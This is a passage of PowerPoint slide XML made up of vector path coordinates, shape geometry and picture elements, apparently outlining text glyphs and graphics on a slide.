                    <a:pt x="9690" y="238658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41300" y="263575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89979" y="283197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150876" y="294843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212852" y="295910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264515" y="286651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300545" y="268732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310667" y="252018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345427" y="265684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403809" y="282994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467741" y="296684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536194" y="306222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605129" y="310896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670509" y="310578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731202" y="305574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786066" y="296214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834009" y="282803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873887" y="265671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924966" y="221424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933919" y="194957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0" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE5DA37-6835-751B-4830-4C6064A9A4A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5764" y="3752008"/>
              <a:ext cx="251336" cy="88064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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3B72E5A1-3C2C-20FC-D6C5-05C889B14F86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7737725" y="3673681"/>
              <a:ext cx="269240" cy="239395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="0" y="238789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269107" y="190523"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="0" y="48265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269107" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="5077" y="45725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5077" y="2387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DC10035A-992E-51C3-57C0-CF0F19459F1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43372" y="3386758"/>
              <a:ext cx="723672" cy="1064259"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CEF7AB-9C83-98A6-5113-C2190CD4534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3499" y="4025145"/>
              <a:ext cx="413819" cy="414019"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A3AADC9A-6141-FF35-FF27-BDACEDCF90F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7243017" y="4502716"/>
              <a:ext cx="821690" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="13686" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26559" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41285" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45475" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34803" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13686" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="73381" y="21587"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61905" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83022" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98064" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102255" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90114" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73381" y="21587"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="124172" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111095" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90114" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102255" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124172" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="69132" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="55581" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34803" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45475" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61905" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73381" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69132" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="181493" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171329" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163495" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135327" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134696" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135353" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165738" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165988" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174491" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179392" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184067" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192966" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197325" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170494" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166948" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160511" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157733" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155407" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152968" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151152" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148270" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147570" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147570" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203084" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203084" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202899" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147563" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148016" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148112" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150393" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158456" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163854" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195948" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194818" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189330" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181493" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="201616" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200938" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198725" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195021" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184654" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179482" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="195948" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177382" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182419" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189036" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190707" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190753" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202899" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202567" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201017" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198434" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195948" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="276078" y="101432"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237481" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240597" y="103126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243737" y="104503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250128" y="106513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253855" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262708" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266932" y="106129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274565" y="102584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276078" y="101432"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="237481" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="224811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224811" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236690" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276078" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278066" y="99919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281273" y="96374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281925" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252296" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249360" y="95313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244188" y="94048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241156" y="92942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="48142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240733" y="45635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244234" y="43580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251800" y="40374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255526" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284489" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283396" y="37755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283191" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="284489" y="39584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="265825" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270613" y="41909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276553" y="51213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277989" y="57883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278021" y="76887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276033" y="84113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268083" y="93326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262595" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281925" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284277" y="92942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286671" y="88719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290239" y="78648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291120" y="72980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291120" y="66703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286775" y="43411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284489" y="39584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="271223" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="257333" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252816" y="28451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244821" y="32177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241049" y="34571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283191" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278247" y="30935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271223" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="360998" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360050" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360050" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366035" y="101387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371907" y="103374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383470" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389975" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403955" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409737" y="105948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419313" y="102697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423491" y="100461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430014" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391510" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385254" y="94071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371952" y="89487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366080" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="405423" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="398354" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390525" y="3190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360659" y="23009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360659" y="38748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395485" y="60584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403345" y="61758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407004" y="62480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423581" y="83322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421277" y="87455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412063" y="93664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405626" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430014" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437493" y="80184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437493" y="69074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="46855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392075" y="46087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374549" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376717" y="21654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385412" y="15716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391149" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="9709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428889" y="7722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423671" y="6074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411905" y="3364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405423" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="433428" y="14225"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404813" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411182" y="15287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423649" y="19554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428663" y="22242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432502" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="14225"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="502222" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="492059" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484225" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456057" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455426" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456083" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486470" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486720" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495221" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500122" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504797" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513718" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518077" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491223" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487677" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481241" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478485" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476136" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473697" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471882" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469000" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468322" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468322" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523813" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523813" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523629" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468316" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468749" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468841" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471123" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479185" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484583" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516700" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515570" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510059" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502222" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="522345" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="521668" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519454" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515773" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505384" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500212" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="516700" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498134" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503148" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509765" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511437" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511482" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523629" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523300" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521758" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519183" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516700" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="558233" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="545540" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545540" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561598" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565099" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572394" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575682" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="592562" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="584612" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588158" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590177" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591885" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="589107" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="578037" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575397" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567696" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563269" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558233" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592562" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592706" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589107" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="611646" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="597892" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628179" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640917" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647141" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634977" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
